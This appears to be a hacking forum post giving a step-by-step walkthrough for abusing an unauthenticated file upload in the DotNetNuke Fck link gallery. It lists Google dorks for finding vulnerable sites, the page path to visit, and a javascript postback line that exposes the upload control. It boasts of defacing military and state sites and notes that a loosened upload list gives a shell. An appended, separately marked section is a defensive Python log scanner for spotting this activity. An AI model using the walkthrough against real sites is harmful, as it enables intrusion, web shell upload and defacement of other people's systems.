Posted by : Unknown




Portal hacking
This bug was found by Iranian researchers.
DNN (DotNetNuke) Gallery, All Versions: Remote File Upload without Authentication
Bug found by Alireza Afzali from ISCN Team
Date bug was found: 2008/05/5
Over 10 military websites and 20 state websites of the United States of America were defaced by this bug.
Find the DNN path, then go to this file:
----------------------------------------------------------------------------------------
Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Select: File ( A File On Your Site )
After it loads, put this code in place of the URL:
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')

Now you see Browse.
Select the root folder and your file will be uploaded to
site/dnn path/Portals/0

Note: by default you can only upload *.swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob,
but the admin may change this list, and then you will have a shell.

Here is the way of hacking site by portal.....
Step 1 :
Code:
Google
Step 2:- Now enter this
Code:
inurl:/tabid/36/language/en-US/Default.aspx
Code:
inurl:"portals/0/"
This is a dork to find sites vulnerable to the portal bug; use it wisely.
Step 3:- You will find many sites. Select the site which you are comfortable with.
Step 4:- For example take this site.
Step 5:- Now replace
Code:
/Home/tabid/36/Language/en-US/Default.aspx
with this
Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6:- You will get a Link Gallery page. So far so good!
Step 7:- Don't do anything for now, FINAL stage APPROACHING.
Step 8:- Now replace the URL in the address bar with a simple script
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 9:- You will find the Browse and Upload options
Step 10:- Upload your package

Congrats You just hacked a site.. =))
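
For a site owner, both paths named above leave traces in the IIS access log. The following is an added example, not part of the original post: it scans a W3C-format log for requests to the gallery page and for follow-up requests under Portals. The field layout, the sample log lines and the finding names are assumptions constructed for illustration.

```python
import re

# Path from the post, lower-cased; DNN may live in a sub-directory, so match the suffix.
GALLERY = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
# Server-executed extensions that are absent from the default upload allow-list.
SCRIPT_EXT = re.compile(r"\.(aspx|asp|ashx|asmx|asa|cer)$")

# Constructed sample (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2008-05-06 10:01:02 203.0.113.7 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 200
2008-05-06 10:01:40 203.0.113.7 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 200
2008-05-06 10:02:05 203.0.113.7 GET /Portals/0/notes.txt 200
2008-05-06 10:03:11 198.51.100.20 GET /Home/tabid/36/Language/en-US/Default.aspx 200
2008-05-06 10:04:30 198.51.100.20 GET /Portals/0/page.aspx 404
"""

def parse_w3c(text):
    """Yield one dict per request, using the column order from the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, parts))

def find_suspicious(text):
    """Return (kind, client_ip, uri) tuples worth an analyst's attention."""
    findings, posted = [], set()
    for r in parse_w3c(text):
        uri, ip = r.get("cs-uri-stem", ""), r.get("c-ip", "-")
        stem = uri.lower()
        if stem.endswith(GALLERY):
            is_post = r.get("cs-method") == "POST"
            if is_post:
                posted.add(ip)  # postback to the gallery page, as in the post
            findings.append(("gallery-postback" if is_post else "gallery-view", ip, uri))
        elif "/portals/" in stem:
            if SCRIPT_EXT.search(stem):
                findings.append(("script-under-portals", ip, uri))
            elif ip in posted:
                findings.append(("portals-fetch-after-postback", ip, uri))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(*finding)
```

The access log alone does not show whether a request was authenticated, so a gallery hit is a lead to check against the portal's own editor activity, not proof of compromise.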
